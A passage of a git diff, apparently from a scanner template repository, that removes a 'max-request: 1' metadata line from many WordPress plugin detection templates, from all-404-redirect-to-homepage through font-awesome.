a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome 